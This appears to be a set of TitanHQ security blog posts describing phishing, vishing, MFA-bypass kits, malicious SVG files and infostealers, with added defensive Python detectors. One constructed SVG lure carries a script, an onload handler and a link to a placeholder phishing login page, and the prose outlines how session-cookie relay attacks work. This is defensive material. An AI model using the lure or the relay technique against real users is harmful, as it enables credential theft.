Security awareness training needs to be provided to the workforce to ensure that employees have the skills to recognize and avoid threats, no matter where they are encountered. Through training, employees should be conditioned to always report potential threats to their security team, and businesses can promote security best practices and eradicate risky behaviors. TitanHQ offers businesses a comprehensive training and phishing simulation platform – SafeTitan – that has been shown to be highly effective at improving employees’ security awareness.

Many malware infections occur via the Internet, and while training can reduce risk, a technical security solution is required to block threats. WebTitan is a DNS-based web filter that is used to block access to known malicious websites, assess websites in real-time for malicious content, block certain file downloads from the Internet, and restrict the sites and web pages employees can access.

With these three security solutions in your arsenal, you will be able to significantly improve your security posture and block information stealers and other threats. Give the TitanHQ team a call today to find out more or take advantage of a free trial of these solutions.

Smishing and Vishing Used by Ransomware Group for Initial Access to Corporate Networks

A ransomware group called EncryptHub has been accelerating attacks and is now known to have breached the networks of more than 600 organizations worldwide. EncryptHub has been active since June 2024 and gains initial access to victims’ networks via spear phishing attacks, with initial contact made via SMS messages rather than email.

The group impersonates commonly used corporate VPN products such as Palo Alto GlobalProtect and Cisco AnyConnect as well as Microsoft 365, and drives traffic to its malicious domains by making contact via personalized SMS messages (smishing) or the phone (vishing).

If vishing is used and the victim is contacted by phone, EncryptHub impersonates a member of the IT helpdesk and uses social engineering techniques to trick them into disclosing their VPN credentials. The phone number is spoofed to make it appear that the call is coming from inside the company, or Microsoft Teams phone numbers are used. The victim is told that there is a problem with the corporate VPN that needs to be resolved, and if the scam works, the user is sent a link via SMS that directs them to a domain that resembles the VPN solution used by that company. If the user enters their credentials, they are used in real time to log in, and if there are any multifactor authentication prompts, the threat actor is able to obtain the codes on the call. After access is gained, the user is redirected to the genuine login page for their VPN, and the call is terminated.

Another tactic used by the group involves SMS messages with a fake Microsoft Teams link, with the goal of capturing the victim’s Microsoft 365 credentials. The user is directed to a Microsoft Teams-related login page and the threat actor exploits Open URL parameters on microsoftonline.com to harvest email addresses and passwords, while the user believes they are interacting with the legitimate Microsoft service. Once access is gained, the group uses PowerShell scripts and malware to gain persistence, then moves laterally, steals data, deploys the ransomware payload, and issues a ransom demand.

The group’s tactics are highly effective, as in contrast to spear phishing via email, it is difficult to block the initial contact via SMS or over the phone. The key to preventing these attacks is improving the security awareness of the workforce and using a web filter to prevent the phishing domains from being accessed by employees. TitanHQ’s web filter, WebTitan, is a DNS-based web filtering solution that is constantly updated with the latest threat intelligence from multiple sources to provide up-to-the-minute protection against new phishing domains. Any attempt to visit a known phishing domain or other malicious site will be blocked, with the user directed to a locally hosted block page.

Regular security awareness training for the workforce is vital to teach security best practices and raise awareness of the tactics used by cybercriminals to breach corporate networks. With the SafeTitan security awareness training platform, businesses can easily create training programs tailored for individuals, roles, and departments, and automate those campaigns so they run continuously throughout the year, delivering training in small chunks on a weekly or monthly basis. It is easy to incorporate new training in response to changing threat actor tactics to increase awareness of specific threats. The platform also includes a phishing simulator for running phishing simulations on the workforce to reinforce training and identify knowledge gaps. If a phishing simulation is failed, training is automatically delivered to the user in real time, relevant to the threat they failed to identify. This ensures training is delivered at the point when it is likely to be most effective.

For more information on TitanHQ solutions, including the WebTitan DNS filter and the SafeTitan security awareness training platform, give the TitanHQ team a call today. Both solutions are available on a free trial to allow you to assess them fully before making a purchase decision.

Cracked Software Used to Deliver Information Stealing Malware

Information stealers are one of the most common ways that initial access is gained to business networks, and the extent to which these malware variants are used is alarming. According to Hudson Rock, an estimated 30 million computers have been compromised using information stealers in the past few years and Check Point reports that infections have increased by 58% in the past year.

Cybercriminals specialized in infecting devices distribute their information stealers, which collect sensitive data such as session cookies and login credentials, allowing access to be gained to corporate networks. Oftentimes, the cybercriminals then sell that access to other cybercriminal groups, acting as initial access brokers. The groups that they work with have their own specialisms, such as conducting ransomware attacks. These malware variants are capable of stealing large amounts of sensitive information from compromised devices. They can exfiltrate files, obtain web browser data and passwords, and steal cryptocurrency extensions. Infection with an information stealer can result in the large-scale theft of data, compromised accounts, and further attacks, including ransomware infections.

Security researchers have recently uncovered a new campaign that distributes information stealers such as Lumma and ACR Stealer via cracked versions of legitimate software. The pirated software can be obtained and used free of charge, albeit illegally, and is available through warez sites and from peer-to-peer file-sharing networks. The installers have been packaged to silently deliver an information stealer. Cybercriminals often use SEO poisoning to get their malicious sites to appear high in search engine listings or add malicious adverts to legitimate ad networks (malvertising) to get them to appear on high-traffic websites. The adverts direct internet users to download sites. Initial contact is also made via email, with workers tricked into opening malicious files that launch scripts that deliver the information stealer payload or direct users to websites where the malware is downloaded under the guise of a legitimate program. Contact may also be made via the telephone, with the criminals impersonating IT helpdesk staff and tricking employees into downloading the malware.

Defending against information stealers means improving defenses against all these tactics, and that means there is no single cybersecurity solution or measure that will be effective against them all, but there are three important cybersecurity measures that you should strongly consider: anti-spam software, a DNS filter, and security awareness training.

Anti-spam Software

Many malware infections occur via email, either through attachments containing malicious scripts or via hyperlinks to websites from which malware is downloaded. When malicious attachments are used, they are not always detected by antispam software and can easily reach end users. To improve detection, email sandboxing is required, where messages are sent to the sandbox for deep inspection. In the sandbox, hyperlinks are also followed to identify any downloads that are triggered. If malicious actions are confirmed, the messages are quarantined and are not deleted.

A DNS Filter

Since many malware infections occur via the Internet, businesses should consider web filtering software. DNS-based web filters allow businesses to control the web content that users can access, block certain file downloads from the internet, and assess web content in real-time for malicious content, without the latency associated with other types of web filters. A DNS filter can prevent users from accessing malicious content and will reduce reliance on employees recognizing and avoiding threats.

Security Awareness Training

Anti-spam software and DNS filters will greatly improve security; however, employee security awareness also needs to be improved. Through regular security awareness training, businesses can eliminate risky practices and train employees how to recognize and avoid threats. By providing training continuously in small chunks throughout the year, businesses can develop a security culture and significantly improve their human defenses.

TitanHQ offers multi-award-winning cybersecurity solutions for SMBs and managed service providers (MSPs) that are easy to implement and offer exceptional protection, including the SpamTitan cloud-based spam filtering service, the WebTitan DNS filter, and the SafeTitan security awareness training and phishing simulation solution. All three solutions are available on a free trial to allow you to see for yourself the difference they make before making a purchase decision. Give the TitanHQ team a call to find out more and to discuss these options, and take the important first step toward improving your defenses.

New Phishing Kit Bypasses MFA in Real-Time

A growing number of businesses are implementing multi-factor authentication to add an extra layer of security and improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized individuals from accessing accounts using compromised credentials, MFA does not provide total protection. Several phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new phishing kit has recently been identified that can intercept credentials in real-time and bypass MFA through session hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and Microsoft 365 accounts.

The Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. Similar to the Evilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the legitimate authentication of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an adversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies, thereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the cybercriminal to instantly access the user’s account.

The user is presented with a phishing link, which is commonly communicated via email. If that link is clicked, the user is directed to a server and is presented with what appears to be a legitimate login page. The page has valid SSL certificates, so no security warnings are generated. The server acts as a reverse proxy, and when the username and password are entered, they are captured and forwarded to the legitimate authentication service in real time.

The cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram, and the one-time passcodes, usually generated via SMS, push notifications, or authentication apps, are intercepted as they are entered by the user. When session cookies are generated, they are immediately hijacked and injected into the attacker’s browser, which means the attacker can impersonate the genuine user without needing their username, password, or 2FA token, since the session has already been authenticated. The kit also includes bulletproof hosting and reCAPTCHA bypasses and allows the attacker to access the account immediately before the user suspects anything untoward has happened.

Phishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so important to have effective anti-spam software, capable of identifying and blocking the initial phishing emails. SpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use, exceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution developed from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan outperformed all other tested email security solutions, achieving the highest overall score thanks to a 100% malware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The exceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing attempts, and email sandboxing to detect and block malware and zero-day threats.

In addition to an advanced spam filtering service, businesses should ensure they provide regular security awareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is an easy-to-use security awareness training platform that makes it easy to create effective training courses and automate the delivery of training content. The platform also includes a phishing simulator with an extensive library of phishing templates that makes it easy to create and automate phishing simulations, generating relevant training automatically if a user is tricked. That means training is delivered at the point when it is likely to be most effective at correcting behavior.

Give the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and SafeTitan products, like all TitanHQ solutions, are also available on a free trial.

SVG Files Increasingly Used in Phishing Campaigns

Security awareness training programs teach employees to be constantly alert to potential phishing emails, especially emails with file attachments. Most employees will be aware that Office documents can contain macros, which if allowed to run, can download malware onto their device, but they are likely much less suspicious about image files. Image files are far less likely to be malicious; however, there is an image file format that can contain malicious content – SVG files – and they are increasingly being used in phishing campaigns.

An SVG or Scalable Vector Graphics file is XML-based, which means it can be scaled without loss of quality. These file types are commonly used for icons and buttons and are extensively used in graphic design, including for company logos. Image files may seem pretty innocuous, but one of the properties of SVG files, unlike non-scalable image formats such as JPEGs, is that they can be created to include scripts, anchor tags, and other types of active web content. Unless the computer has been configured to open SVG files in a specific image program, an SVG file will be opened in a web browser.

One campaign incorporated the SharePoint logo and advised the user that a secure document had been shared through Microsoft SharePoint. The image included a folder icon with the file name “Updated Compensation and Benefits” and an “open” button that the user was encouraged to click. Clicking that button directs the user to a phishing page where they must enter their credentials to view the file. Those credentials will be captured and used to access the user’s account. Many phishing campaigns that use SVG file attachments include hyperlinks that direct the user to a site that spoofs a well-known brand such as Microsoft to harvest credentials, for example by displaying a fake Microsoft 365 login page. These phishing pages have been designed to be indistinguishable from the genuine login prompt and may even autofill the user’s login name into the login prompt.

There are two main advantages to using SVG files in phishing campaigns. First and foremost, the file is less likely to be flagged as malicious by an email security solution, many of which do not analyze the content of SVG files, therefore ensuring messages containing SVG files are delivered to an end user’s inbox. Secondly, since awareness of malicious SVG files is low, the targeted individuals may be easily tricked into clicking on the hyperlink. The use of SVG files in phishing campaigns is becoming more common, and this trend is likely to continue in 2025. Businesses should ensure that they have adequate defenses to block these attacks, which should consist of advanced anti-spam software to block these phishing emails, and security awareness training content should be updated to raise awareness of this attack technique.
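Because an SVG is XML, the active content the article describes is easy to look for in an attachment before it reaches a browser. The added example below (not TitanHQ's or any vendor's code) parses an SVG and reports script elements, hyperlinks on `<a>` elements, event-handler attributes, `javascript:` URIs, `foreignObject` (which can embed HTML) and external references. The benign icon and the "shared document" lure are constructed test inputs; `phish.example` is a placeholder hostname.

```python
"""Flag SVG attachments that carry active content.

Added example for this article; not TitanHQ's or any vendor's code. It parses
an SVG as XML and reports the constructs the text describes. Samples are
constructed; the hostname is a placeholder.
"""
from typing import List, Optional
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"


def _local(name: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def _href(elem: ET.Element) -> Optional[str]:
    """SVG 2 uses a plain href attribute; older files use xlink:href."""
    return elem.get("href") or elem.get(XLINK_HREF)


def scan_svg(data: bytes) -> List[str]:
    """Return findings in document order; an empty list means nothing active was seen.
    Unparseable input is itself reported, since a browser may still render it."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings: List[str] = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name == "script":
            findings.append("script element")
        elif name == "foreignobject":
            findings.append("foreignObject element (can embed HTML)")
        for attr in elem.attrib:
            if _local(attr).startswith("on"):  # onload, onclick, onmouseover, ...
                findings.append(f"event handler {_local(attr)} on <{name}>")
        href = _href(elem)
        if href is not None:
            target = href.strip().lower()
            if target.startswith("javascript:"):
                findings.append(f"javascript: URI on <{name}>")
            elif name == "a":
                findings.append(f"hyperlink on <a>: {href.strip()}")
            elif target.startswith(("http://", "https://")):
                findings.append(f"external reference on <{name}>: {href.strip()}")
    return findings


def is_active_svg(data: bytes) -> bool:
    """True if the attachment should be held for review rather than delivered as an image."""
    return bool(scan_svg(data))


# Constructed sample: a plain icon with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">
  <circle cx="8" cy="8" r="6" fill="#0078d4"/>
</svg>"""

# Constructed sample shaped like the lure described above: a "shared document"
# graphic whose button is a hyperlink, plus an onload handler and a script element.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="400" height="200" onload="init()">
  <text x="20" y="40">A secure document has been shared with you</text>
  <a xlink:href="https://phish.example/login"><rect x="20" y="80" width="100" height="30"/></a>
  <script>document.title = "Shared document"</script>
</svg>"""

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        print(label, scan_svg(blob) or "no active content")
```

A strict XML parser is the right first pass, but the failure path matters: browsers are more forgiving than `ElementTree`, so a file that fails to parse should be treated as suspicious rather than as "not an SVG", which is why `scan_svg` reports the parse error as a finding.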

SpamTitan is an advanced spam filtering service from TitanHQ that has been proven to block more phishing emails than other email security solutions. SpamTitan was recently put to the test by VirusBulletin and outperformed all other tested anti-spam software solutions, blocking 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. Machine learning algorithms ensure that the solution gets better over time, extensive threat intelligence feeds keep the solution automatically updated with up-to-the-minute threat intelligence, and a next-generation email sandbox provides exceptional protection against malware. When coupled with the SafeTitan security awareness training and phishing simulations to improve employee awareness, businesses will be well protected against phishing, malware, and other email-based attacks. Give the TitanHQ team a call today for more information about these solutions or take advantage of a free trial and see for yourself the difference these solutions make to your security posture.

Email Bombing: What You Need to Know to Protect Your Business

Investigations of cyberattacks have identified an increasing number of incidents that started with email bombing. A high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting a malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email bombing is now being used to increase the effectiveness of phishing campaigns.

With email bombing, the user is sent a large number of spam emails in a short period of time, such as by adding the user to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam problem and then impersonates a member of the IT department, claiming they can fix the problem, with contact often made via a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and granting the threat actor remote access to their device. The threat actor will establish persistent access to the user’s device during the remote access session. What starts with an email bombing attack often ends with a ransomware attack.
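The burst itself is detectable at the mail gateway before the follow-up "IT helpdesk" contact arrives. The added example below (not TitanHQ's or any vendor's code) runs a sliding-window count per recipient over gateway log lines and alerts when one mailbox receives many messages from many distinct senders in a short window, which is what mass subscription to mailing lists looks like. The log format (`<ISO timestamp> <sender> -> <recipient>`), the thresholds and the sample traffic are constructed assumptions for this example.

```python
"""Detect an email-bombing burst from mail gateway logs.

Added example for this article, not TitanHQ's or any vendor's code. The log
format and the sample traffic are constructed. The signal: one recipient
receiving far more inbound mail than usual in a short window, from many
distinct senders.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, Tuple


def make_sample_log() -> str:
    """Constructed: bob gets 25 subscription confirmations in under 3 minutes from
    25 different senders; alice gets four normal messages spread over half an hour."""
    t0 = datetime(2025, 2, 10, 9, 0, 0)
    lines = []
    for i in range(25):
        ts = t0 + timedelta(seconds=7 * i)
        lines.append(f"{ts.isoformat()} confirm@list-{i:02d}.example -> bob@corp.example")
    for i in range(4):
        ts = t0 + timedelta(minutes=10 * i)
        lines.append(f"{ts.isoformat()} colleague@corp.example -> alice@corp.example")
    return "\n".join(sorted(lines))  # gateway logs are time-ordered; the detector relies on that


def parse_line(line: str) -> Tuple[datetime, str, str]:
    """Assumed format: '<ISO timestamp> <sender> -> <recipient>'."""
    ts, rest = line.split(" ", 1)
    sender, recipient = rest.split(" -> ")
    return datetime.fromisoformat(ts), sender.strip(), recipient.strip()


def detect_email_bombing(log_text: str,
                         threshold: int = 20,
                         min_senders: int = 10,
                         window: timedelta = timedelta(minutes=10)) -> Dict[str, dict]:
    """Sliding-window count per recipient. Alerts the first time a recipient has at
    least `threshold` messages from at least `min_senders` distinct senders inside
    `window`. Returns {recipient: details}."""
    recent = defaultdict(deque)  # recipient -> deque of (timestamp, sender) inside the window
    alerts: Dict[str, dict] = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, sender, rcpt = parse_line(line)
        q = recent[rcpt]
        q.append((ts, sender))
        while q and ts - q[0][0] > window:
            q.popleft()  # drop entries older than the window
        senders = {s for _, s in q}
        if rcpt not in alerts and len(q) >= threshold and len(senders) >= min_senders:
            alerts[rcpt] = {
                "count": len(q),
                "distinct_senders": len(senders),
                "window_start": q[0][0],
                "window_end": ts,
            }
    return alerts


if __name__ == "__main__":
    for rcpt, info in detect_email_bombing(make_sample_log()).items():
        print(f"{rcpt}: {info['count']} messages from {info['distinct_senders']} senders "
              f"between {info['window_start']:%H:%M:%S} and {info['window_end']:%H:%M:%S}")
```

The distinct-sender condition is what separates this pattern from a single sender's legitimate broadcast or a misbehaving internal application. An alert here is most useful when the helpdesk is told about it immediately, since the affected user is about to be contacted by someone claiming to be from IT.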

There are several measures that you should consider implementing to prevent these attacks. If you use Microsoft Teams, consider restricting calls and messages from external organizations, unless there is a legitimate need to accept such requests. If so, ensure permission is only given to trusted individuals such as business partners. The use of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent the installation of these tools, including using a web filter to block downloads of these tools (and other executables) from the Internet.

A spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as SpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails, along with email sandboxing to identify novel threats and zero-day malware. In the Q4, 2024, tests at VirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails, and 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam software under test.

Businesses should not underestimate the importance of security awareness training and phishing simulations. Regular security awareness training should be provided to all members of the workforce to raise awareness of the tactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social engineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security awareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For more information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed service providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity solutions.

Microsoft 365 Accounts Targeted Using Sneaky 2FA Phishing Kit

As the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor authentication on accounts can be costly. In that attack, multifactor authentication was not implemented on a Citrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information of 190 million individuals. The ransomware attack caused a prolonged outage and remediation and recovery cost Change Healthcare an estimated $2.9 billion last year.

The attack should serve as a warning to all companies that multifactor authentication is an essential cybersecurity measure: if passwords are compromised, access to accounts can still be prevented. Unfortunately, multifactor authentication can be circumvented. Threat actors are increasingly using phishing kits capable of intercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages sold to cybercriminals that cover all aspects of phishing. Once purchased, campaigns can be conducted with minimal effort, as the kit generates copies of websites that impersonate well-known brands, provides the infrastructure for capturing credentials, and supplies templates for phishing emails. After paying the fee, all that is required is a list of target email addresses, which can easily be purchased on hacking forums.

Some of the more advanced phishing kits defeat multifactor authentication by harvesting Microsoft 365 and Gmail session cookies, which are then replayed to access the account without completing MFA again. One of the latest kits to be identified has been dubbed Sneaky 2FA. It was first identified being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity firm Sekoia, who identified almost 100 domains hosting phishing pages created with the kit.

As with a standard phishing attack, emails are sent to trick recipients into visiting a phishing page. One campaign using the Sneaky 2FA kit uses payment receipt-related emails to get the recipient to open a PDF attachment containing a QR code that directs them to a Sneaky 2FA page on a compromised website, usually a compromised WordPress site. These pages show a blurred document in the background with a login prompt in front of it; Microsoft 365 credentials are supposedly required to view the blurred content. The phishing page pre-fills the user's email address in the login prompt, so they only need to enter their password. To evade detection and analysis, the kit employs traffic filtering, Cloudflare Turnstile challenges, and CAPTCHA checks.

Many phishing kits use a reverse proxy to relay the victim's requests to the real login page; the Sneaky 2FA phishing server instead talks to the Microsoft 365 API directly. Once the anti-analysis checks are passed, JavaScript on the phishing page drives the authentication steps. When the password is entered, the user is moved to the next page and the email address and password are sent to the phishing server via an HTTP POST. The phishing server submits them to Microsoft, learns which 2FA method is configured for the account, prompts the victim for the corresponding code or approval, and relays the victim's response. The result is a valid session cookie that gives account access regardless of the 2FA method in use: Microsoft Authenticator, a one-time password code, or SMS verification.

Phishing kits such as Sneaky 2FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA; however, they are not effective against phishing-resistant MFA such as FIDO2/WebAuthn authenticators (including biometric platform authenticators), because the credential is bound to the genuine site's origin and cannot be relayed through a phishing page. Note that the kit does not break the second factor itself: the victim completes MFA normally and the kit steals the resulting session cookie, so defenses must also consider what happens after a successful login. The problem is that phishing-resistant MFA can be expensive and difficult to deploy at scale.
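Because the kit logs in from its own server and then replays the cookie from wherever the operator sits, the sign-in that satisfied MFA and the later use of that session tend to come from different IPs and user agents, and the sign-in IP is not one the user normally uses. The Python below is an added example written for this page (not TitanHQ's or Microsoft's code) that applies that logic to a constructed, simplified sign-in log; real Entra ID sign-in logs use different field names, and the IP baseline would come from the user's sign-in history rather than a hard-coded dictionary.

```python
"""Spot session-cookie replay after an adversary-in-the-middle (AitM) login.

Added example for this page; not TitanHQ's or Microsoft's code. Event records
and the per-user IP baseline are constructed; real sign-in logs differ.
"""
from datetime import datetime, timedelta

FMT = "%Y-%m-%dT%H:%M:%SZ"

# Constructed sample: alice is a normal login; bob's login was relayed by a
# phishing server (198.51.100.7) and the cookie replayed from 192.0.2.55.
SAMPLE_EVENTS = [
    {"ts": "2025-01-20T09:00:00Z", "user": "alice@example.com", "session": "s-111",
     "ip": "203.0.113.10", "ua": "Edge/120 Windows", "type": "interactive_signin", "mfa": True},
    {"ts": "2025-01-20T09:05:00Z", "user": "alice@example.com", "session": "s-111",
     "ip": "203.0.113.10", "ua": "Edge/120 Windows", "type": "token_use"},
    {"ts": "2025-01-20T10:00:00Z", "user": "bob@example.com", "session": "s-222",
     "ip": "198.51.100.7", "ua": "python-requests/2.31", "type": "interactive_signin", "mfa": True},
    {"ts": "2025-01-20T10:02:00Z", "user": "bob@example.com", "session": "s-222",
     "ip": "192.0.2.55", "ua": "Chrome/121 Linux", "type": "token_use"},
]

# Constructed baseline of IPs each user has previously signed in from.
KNOWN_IPS = {
    "alice@example.com": {"203.0.113.10"},
    "bob@example.com": {"203.0.113.20"},
}


def find_session_anomalies(events, known_ips, max_gap=timedelta(hours=1)):
    """Return (user, session, reason) triples.

    Flags (1) an MFA-satisfied interactive sign-in from an IP outside the
    user's baseline and (2) any later use of that session, within `max_gap`,
    from a different IP or user agent than the one that authenticated.
    """
    findings = []
    signins = {}   # (user, session) -> (timestamp, ip, user agent) of the login
    for e in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort lexically
        ts = datetime.strptime(e["ts"], FMT)
        key = (e["user"], e["session"])
        if e["type"] == "interactive_signin":
            signins[key] = (ts, e["ip"], e["ua"])
            if e.get("mfa") and e["ip"] not in known_ips.get(e["user"], set()):
                findings.append((e["user"], e["session"],
                                 f"MFA sign-in from unfamiliar IP {e['ip']}"))
        elif e["type"] == "token_use" and key in signins:
            t0, ip0, ua0 = signins[key]
            if ts - t0 > max_gap:
                continue
            if e["ip"] != ip0:
                findings.append((e["user"], e["session"],
                                 f"session used from {e['ip']} but issued to {ip0}"))
            if e["ua"] != ua0:
                findings.append((e["user"], e["session"],
                                 f"user agent changed from {ua0!r} to {e['ua']!r}"))
    return findings


if __name__ == "__main__":
    for user, session, reason in find_session_anomalies(SAMPLE_EVENTS, KNOWN_IPS):
        print(f"{user} {session}: {reason}")
```

Either signal alone produces false positives (VPNs, mobile networks, browser updates); the combination of an unfamiliar sign-in IP followed within minutes by use of the same session from yet another IP is the pattern worth paging on, and the response is to revoke the session, not just reset the password.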

Businesses can greatly improve their defenses with advanced spam filtering software that includes AI and machine learning detection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and banners identifying emails from external senders. Effective email filtering ensures these malicious emails do not land in employee inboxes. TitanHQ offers two email security solutions: SpamTitan email security and the PhishTitan anti-phishing solution for M365. The engine that powers both was recently ranked first for protection in the Q4 2024 VirusBulletin tests, achieving 100% malware and 100% phishing detection.

Regular security awareness training should also be provided to all members of the workforce to raise awareness of threats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy to create and automate training courses and add in new training content when new threat actor tactics are identified. The platform also includes a phishing simulator for reinforcing training and identifying individuals in need of additional training.

For more information on improving your defenses against phishing and malware, give the TitanHQ team a call. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.

Dangerous New Information Stealer Distributed via Phishing and SEO Poisoning

A new malware variant called PLAYFULGHOST has been discovered being distributed via phishing emails and via websites pushed to the top of search engine results through black hat search engine optimization (SEO) tactics.

PLAYFULGHOST was analyzed by Google's Mandiant Managed Defense team, which confirmed that the malware has extensive information-stealing capabilities. These include keylogging, taking screenshots, recording audio, copying clipboard contents, stealing QQ account information, and collecting system metadata and details of installed security solutions. The malware can also block mouse and keyboard input, clear Windows event logs, delete web browser caches and profiles, erase profiles and local storage for messaging apps, transfer files, and download additional payloads. It achieves persistence in four ways: registry keys, scheduled tasks, installation as a Windows service, and entries in the Windows Startup folder. In short, PLAYFULGHOST is a highly capable and very dangerous new malware variant.

An analysis of the distribution methods identified SEO poisoning, where websites are promoted so that they rank highly for search terms related to Virtual Private Network solutions, including the legitimate LetsVPN product. A visitor to one of these sites can download what appears to be the LetsVPN installer; however, it has been trojanized and silently loads PLAYFULGHOST into memory via an interim payload. Phishing is also used to distribute the malware. While multiple lures could be used in this campaign, intercepted emails used code-of-conduct-related lures to trick the recipient into opening a malicious RAR archive containing a Windows executable that downloads and executes the malware from a remote server.

Once a device is infected, detection can be problematic because the malware runs in memory, and its multiple persistence mechanisms make removal challenging. Prevention is therefore vital, and because the malware is distributed in several ways, it requires multiple measures. To protect against malware delivery via SEO poisoning and malvertising, businesses should use a web filter and provide regular security awareness training to the workforce. The WebTitan DNS filter protects against web-delivered malware in a variety of ways. WebTitan is fed extensive, up-to-the-minute threat intelligence on malicious websites and domains and prevents users (on and off the network) from visiting them, whether they arrive by browsing directly or via a malvertising redirect.

WebTitan can be configured to block certain downloads from the Internet by file extension, such as installers and other executable files. In addition to preventing malware delivery, this feature can be used to control shadow IT – software installations that have not been authorized by the IT department. WebTitan can also be used to control the web content that employees can access, by blocking access to web content that serves no work purpose along with risky categories of websites.

Security awareness training is vital for making employees aware of the risks of malware downloads from the Internet. Employees should be instructed not to download software from unofficial websites, warned of the risks of malvertising, and told not to trust a website simply because it is positioned high in the search engine listings. Employees should also be warned of the risk of phishing, be taught how to identify a phishing attempt, and be conditioned to report suspicious emails to their security team. A phishing simulator should also be used to reinforce training and identify individuals who are susceptible to phishing so they can be provided with additional training. TitanHQ’s SafeTitan security awareness training and phishing simulation platform makes this as easy as possible, automating the delivery of training and phishing simulation exercises.

TitanHQ offers two powerful anti-phishing solutions – PhishTitan for Microsoft 365 users and SpamTitan anti-spam software. Both are powered by the same advanced engine that was recently assessed by VirusBulletin, and confirmed to block 100% of malware, 100% of phishing emails, and 99.999% of spam emails in Q4 tests. The incredibly strong performance earned TitanHQ top spot out of all the leading solutions under test. The strong anti-malware performance was due to twin (signature-based) antivirus engines and cutting-edge behavioral protection with email sandboxing.

With new, stealthy malware variants constantly being released, and cybercriminals developing highly sophisticated AI-based phishing campaigns, businesses need to ensure they have cybersecurity solutions capable of identifying and blocking the threats. With TitanHQ as your cybersecurity partner, you will be well protected against ever-evolving cyber threats. Give the TitanHQ team a call today for further information on bolstering your malware and phishing defenses or put these solutions to the test in a free trial.

Beware of Tax Season Phishing Scams

In the United States, tax returns for the previous year must be filed by Tax Day, which falls on Tuesday, April 15, 2025. Tax season officially started on January 27, 2025, when the Internal Revenue Service (IRS) began accepting 2024 tax returns. Tax season is a busy time for cybercriminals, who take advantage of individuals and businesses under pressure to file their annual returns and try to steal personal information to file fraudulent tax returns in victims' names and for other nefarious purposes.

Cybercriminals use tried and tested methods for their scams, but over the past few years, the scams have become more sophisticated. There has been a significant increase in the use of AI tools to craft highly convincing phishing emails. Phishing is one of the most common ways that cybercriminals trick people into disclosing sensitive information during tax season. One of the most common phishing techniques in tax season involves impersonation of the IRS. Emails are sent that appear to have come from an official IRS domain, the contact information in the email may be 100% correct, and the emails contain the IRS logo. The lures used in these scams include fake offers of tax refunds with rapid payment, legal threats, and criminal charges for tax fraud. These scams tempt or scare people into visiting a website linked in the email or calling a telephone number provided in the email.

The website to which the user is directed mimics the official IRS site, and social engineering techniques are used to get the user to disclose sensitive information. That information is rapidly used to file a fraudulent tax return, with the victim only discovering the scam when they file their own return and are notified by the IRS that it is a duplicate. Alternatively, victims are told they must pay outstanding tax immediately and are threatened with fines and criminal charges if they fail to do so. Scams promising a tax refund require personal information and bank account details to be disclosed.

Businesses are targeted in a variety of tax season scams, with one of the most common being fake tax services. Filing tax returns can be a time-consuming and arduous process, so tax filing services that do all of the work are an attractive choice. Businesses may be contacted via email, telephone, or could be directed to these scam services via the Internet. Businesses are tricked into providing personal and financial information, which could be used to file a fraudulent tax return. Commonly, the aim is to trick the business into downloading malware onto their device. These services may lure victims by promising quick tax refunds, which can be attractive for cash-strapped businesses.

